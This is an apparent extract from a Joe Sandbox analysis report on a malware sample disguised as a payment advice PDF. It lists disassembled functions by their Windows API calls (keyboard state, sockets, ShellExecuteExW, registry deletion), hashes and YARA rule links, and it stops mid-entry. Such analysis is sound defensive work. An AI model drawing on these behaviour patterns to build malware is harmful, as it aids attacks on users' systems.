                                                              • API String ID: 1268545403-0
                                                              • Opcode ID: f6b8ac181d8e9399751cb4eeff7e9b1a1837de704b50263dee2accef801b0c81
                                                              • Instruction ID: f3f6aae252ae2c06efc482ee5474264491784e04e7eeb2711d5c11e24c99fe71
                                                              • Opcode Fuzzy Hash: f6b8ac181d8e9399751cb4eeff7e9b1a1837de704b50263dee2accef801b0c81
                                                              • Instruction Fuzzy Hash: 8141243021C6889AD735CB288C8CB6B7BA2FB85314F98C81DF94BC3562C675D885D721
                                                              Function 008A70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 008A70DD
                                                                • Part of subcall function 00860DB6: std::exception::exception.LIBCMT ref: 00860DEC
                                                                • Part of subcall function 00860DB6: __CxxThrowException@8.LIBCMT ref: 00860E01
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008A7114
                                                              • EnterCriticalSection.KERNEL32(?), ref: 008A7130
                                                              • _memmove.LIBCMT ref: 008A717E
                                                              • _memmove.LIBCMT ref: 008A719B
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 008A71AA
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008A71BF
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 008A71DE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 256516436-0
                                                              • Opcode ID: 6994b0cd5946f6e740c7079bf6eade0788e43f57191c1c8b9af8dee726030d81
                                                              • Instruction ID: 188cd3172222342ac2c08e3f45351c01c1c037d0cbf985cc61d643e6a7cbf107
                                                              • Opcode Fuzzy Hash: 6994b0cd5946f6e740c7079bf6eade0788e43f57191c1c8b9af8dee726030d81
                                                              • Instruction Fuzzy Hash: FC316D71900205EBDB00DFA8DC85EAFB7B9FF45310F1541B6E904EB246DB309A10DBA5
                                                              Function 008C61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 008C61EB
                                                              • GetDC.USER32(00000000), ref: 008C61F3
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008C61FE
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 008C620A
                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 008C6246
                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 008C6257
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,008C902A,?,?,000000FF,00000000,?,000000FF,?), ref: 008C6291
                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008C62B1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                              • String ID:
                                                              • API String ID: 3864802216-0
                                                              • Opcode ID: 846d98c0744300fd09cd0205d0aa4ab27074b98e403d0f1572dbff28d5707a72
                                                              • Instruction ID: 7a6f2972e7c8832c058643a5dc35476f0b9e783e271122461470214f0c406719
                                                              • Opcode Fuzzy Hash: 846d98c0744300fd09cd0205d0aa4ab27074b98e403d0f1572dbff28d5707a72
                                                              • Instruction Fuzzy Hash: 54316B72201210BFEB118F50CC8AFEA3BBAFF59765F044065FE08DA292D6759C51CB60
                                                              Function 0089BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memcmp
                                                              • String ID:
                                                              • API String ID: 2931989736-0
                                                              • Opcode ID: 6c99e431ef91f1a875fa1c4943b3ae6fbdd243d538656a33c290cd6673e7b8f3
                                                              • Instruction ID: 9322ea56e5edc999ac32b339ae25ae3342f759ed7a250620ecf9d784520e7c1d
                                                              • Opcode Fuzzy Hash: 6c99e431ef91f1a875fa1c4943b3ae6fbdd243d538656a33c290cd6673e7b8f3
                                                              • Instruction Fuzzy Hash: A52171A16012097BAE047615AE42FBB735EFF6039CF0C4011FD04DA787EF58DE1182A6
                                                              Function 008AEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                                • Part of subcall function 0085FC86: _wcscpy.LIBCMT ref: 0085FCA9
                                                              • _wcstok.LIBCMT ref: 008AEC94
                                                              • _wcscpy.LIBCMT ref: 008AED23
                                                              • _memset.LIBCMT ref: 008AED56
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                              • String ID: X
                                                              • API String ID: 774024439-3081909835
                                                              • Opcode ID: f0777f84d131a121e10349bcb8a33ad07ab50d924922ad4b136f44b37ff7b345
                                                              • Instruction ID: afcc0c18171c25c1be81f139e314e60680104f95312e8088451eb2bc44ff1931
                                                              • Opcode Fuzzy Hash: f0777f84d131a121e10349bcb8a33ad07ab50d924922ad4b136f44b37ff7b345
                                                              • Instruction Fuzzy Hash: 13C149716087149FD764EF28C885A6AB7E4FF85310F00492DF999DB6A2DB70E845CB83
                                                              Function 008B6B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 008B6C00
                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 008B6C21
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 008B6C34
                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 008B6CEA
                                                              • inet_ntoa.WSOCK32(?), ref: 008B6CA7
                                                                • Part of subcall function 0089A7E9: _strlen.LIBCMT ref: 0089A7F3
                                                                • Part of subcall function 0089A7E9: _memmove.LIBCMT ref: 0089A815
                                                              • _strlen.LIBCMT ref: 008B6D44
                                                              • _memmove.LIBCMT ref: 008B6DAD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                              • String ID:
                                                              • API String ID: 3619996494-0
                                                              • Opcode ID: d468c889455f327136e15021b5562e812f7a47faa36fcecd8b7fe4431111604e
                                                              • Instruction ID: 19e24d58fab839a4681b25f5c77c7da48694cd53fdf82ba18f9b93e7454a3625
                                                              • Opcode Fuzzy Hash: d468c889455f327136e15021b5562e812f7a47faa36fcecd8b7fe4431111604e
                                                              • Instruction Fuzzy Hash: A981C071204204ABD720EB28CC82EAFB7A9FF84724F14491DF555DB292EB75ED14CB52
                                                              Function 00841424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd5ca9fe9372c5e593452f22ba8bd45ae23d6b4c6cc3cb3b6835a0c920eee135
                                                              • Instruction ID: b30decd15277d26c96647260bae9d1096e74d99c5fa7cf9caafe9090b104fc17
                                                              • Opcode Fuzzy Hash: cd5ca9fe9372c5e593452f22ba8bd45ae23d6b4c6cc3cb3b6835a0c920eee135
                                                              • Instruction Fuzzy Hash: 7C71493090010DEFDF05CF98CC89AAEBB7AFF85354F148159F915EA251C734AA91CBA4
                                                              Function 008CB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindow.USER32(01624EE8), ref: 008CB3EB
                                                              • IsWindowEnabled.USER32(01624EE8), ref: 008CB3F7
                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 008CB4DB
                                                              • SendMessageW.USER32(01624EE8,000000B0,?,?), ref: 008CB512
                                                              • IsDlgButtonChecked.USER32(?,?), ref: 008CB54F
                                                              • GetWindowLongW.USER32(01624EE8,000000EC), ref: 008CB571
                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 008CB589
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                              • String ID:
                                                              • API String ID: 4072528602-0
                                                              • Opcode ID: 32c9580f424b209a8312dbe3c038923349bbc6943fc01a37112c3a8c1a05545e
                                                              • Instruction ID: 556d47dd2f1338704051f7461d7c149c0b8b5466d5e5051a610dc36b83394911
                                                              • Opcode Fuzzy Hash: 32c9580f424b209a8312dbe3c038923349bbc6943fc01a37112c3a8c1a05545e
                                                              • Instruction Fuzzy Hash: 37718E34608A44EFEB249F64C896FAA7BBAFF09300F14415DEA45D73A2C731E940DB54
                                                              Function 008BF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 008BF448
                                                              • _memset.LIBCMT ref: 008BF511
                                                              • ShellExecuteExW.SHELL32(?), ref: 008BF556
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                                • Part of subcall function 0085FC86: _wcscpy.LIBCMT ref: 0085FCA9
                                                              • GetProcessId.KERNEL32(00000000), ref: 008BF5CD
                                                              • CloseHandle.KERNEL32(00000000), ref: 008BF5FC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                              • String ID: @
                                                              • API String ID: 3522835683-2766056989
                                                              • Opcode ID: 29e3a780931f5a2533138718993f590acb52df6b7ec91a90063d678b19df93ac
                                                              • Instruction ID: 644b5ccb02dd8922936d536057994fdb705eb8a54fe3d231bc392ff89cf8c7f2
                                                              • Opcode Fuzzy Hash: 29e3a780931f5a2533138718993f590acb52df6b7ec91a90063d678b19df93ac
                                                              • Instruction Fuzzy Hash: 7761BD75A00619DFCB24EF68C8819AEBBF5FF48310F148069E959EB352CB31AD41CB85
                                                              Function 008A0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32(?), ref: 008A0F8C
                                                              • GetKeyboardState.USER32(?), ref: 008A0FA1
                                                              • SetKeyboardState.USER32(?), ref: 008A1002
                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 008A1030
                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 008A104F
                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 008A1095
                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008A10B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: 06e23ab80df4c2008be2a3dcaa58fe347716abbce3c1b41fab7bc1542a38ec1d
                                                              • Instruction ID: 6aae1ffd48a561ad07bb3b8fef9cd121c0d192a2dba6bf6518fc512a0a414b36
                                                              • Opcode Fuzzy Hash: 06e23ab80df4c2008be2a3dcaa58fe347716abbce3c1b41fab7bc1542a38ec1d
                                                              • Instruction Fuzzy Hash: 9B51C160604AD53DFF3642388C19BB6BEA9BB07304F088589E2D5D5CD3C6A9ECD4DB51
                                                              Function 008A0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32(00000000), ref: 008A0DA5
                                                              • GetKeyboardState.USER32(?), ref: 008A0DBA
                                                              • SetKeyboardState.USER32(?), ref: 008A0E1B
                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008A0E47
                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 008A0E64
                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008A0EA8
                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008A0EC9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: 740038ffb7e086bb575363a3f053e5c2c382cc595c03efcf9e5aa6a9f673ed31
                                                              • Instruction ID: 7fb36715509f236b732de165d65c321562aaf7280abef0974d4db3c24af4462e
                                                              • Opcode Fuzzy Hash: 740038ffb7e086bb575363a3f053e5c2c382cc595c03efcf9e5aa6a9f673ed31
                                                              • Instruction Fuzzy Hash: 5F51E4A15486D53DFB3283648C45B7A7EA9FB07300F088989E2D4D6CC2D795ECA8EB51
                                                              Function 008A55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _wcsncpy$LocalTime
                                                              • String ID:
                                                              • API String ID: 2945705084-0
                                                              • Opcode ID: ed4ab9581b57f7f8f7fa57116fce4528846869ad9010d2aa02176884c4a3064c
                                                              • Instruction ID: a7ca46fd6604856cffdb533441930c7af13d205cc6363b2397b7a02632643800
                                                              • Opcode Fuzzy Hash: ed4ab9581b57f7f8f7fa57116fce4528846869ad9010d2aa02176884c4a3064c
                                                              • Instruction Fuzzy Hash: 7341D865C10628B6DB11EBB88C86ACFB3B8FF05310F514456E515E3161FB34A285C7A7
                                                              Function 008A3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 008A466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008A3697,?), ref: 008A468B
                                                                • Part of subcall function 008A466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008A3697,?), ref: 008A46A4
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 008A36B7
                                                              • _wcscmp.LIBCMT ref: 008A36D3
                                                              • MoveFileW.KERNEL32(?,?), ref: 008A36EB
                                                              • _wcscat.LIBCMT ref: 008A3733
                                                              • SHFileOperationW.SHELL32(?), ref: 008A379F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                              • String ID: \*.*
                                                              • API String ID: 1377345388-1173974218
                                                              • Opcode ID: eb08e3f83e58ecba7fd28744ab2823cb4516b9853bf33be234f725abd3ccc2ae
                                                              • Instruction ID: b6b472e29210a590deeedcbc8417ec862a3779f88f97d4a435f30d0f1c8ef4f9
                                                              • Opcode Fuzzy Hash: eb08e3f83e58ecba7fd28744ab2823cb4516b9853bf33be234f725abd3ccc2ae
                                                              • Instruction Fuzzy Hash: 98419F71508344AEE752EF68C4419DFB7E8FF8A380F40086EB49AC3651EA74D689C752
                                                              Function 008C7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 008C72AA
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008C7351
                                                              • IsMenu.USER32(?), ref: 008C7369
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008C73B1
                                                              • DrawMenuBar.USER32 ref: 008C73C4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                              • String ID: 0
                                                              • API String ID: 3866635326-4108050209
                                                              • Opcode ID: e4c49e6afee7f362225a8f2292b591f332b7237a6a2fe98c899c4d46154d3128
                                                              • Instruction ID: a9811cd504de63c82bb01701731545d32926d8f57329a969e2d6af2bec7a74ea
                                                              • Opcode Fuzzy Hash: e4c49e6afee7f362225a8f2292b591f332b7237a6a2fe98c899c4d46154d3128
                                                              • Instruction Fuzzy Hash: 61411375A04248AFDB20DF60D884E9ABBB9FB08354F648529FD05AB390D730ED50EF50
                                                              Function 008C0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 008C0FD4
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008C0FFE
                                                              • FreeLibrary.KERNEL32(00000000), ref: 008C10B5
                                                                • Part of subcall function 008C0FA5: RegCloseKey.ADVAPI32(?), ref: 008C101B
                                                                • Part of subcall function 008C0FA5: FreeLibrary.KERNEL32(?), ref: 008C106D
                                                                • Part of subcall function 008C0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 008C1090
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 008C1058
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                              • String ID:
                                                              • API String ID: 395352322-0
                                                              • Opcode ID: 0f03feed0c440f07c0a7f8f05a0926bd36c072a391ed9662f52c3848cfd4af9b
                                                              • Instruction ID: b509d6d2b44e72a20b8d5b0f83e15c2da91e95158e6986d4972d728ee4c0da98
                                                              • Opcode Fuzzy Hash: 0f03feed0c440f07c0a7f8f05a0926bd36c072a391ed9662f52c3848cfd4af9b
                                                              • Instruction Fuzzy Hash: FB310771900509EFEB159B94DC89EFEB7BCFB09340F00416AE611E2142EB749E899AA0
                                                              Function 008C62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008C62EC
                                                              • GetWindowLongW.USER32(01624EE8,000000F0), ref: 008C631F
                                                              • GetWindowLongW.USER32(01624EE8,000000F0), ref: 008C6354
                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 008C6386
                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008C63B0
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 008C63C1
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008C63DB
                                                              Memory Dump Source
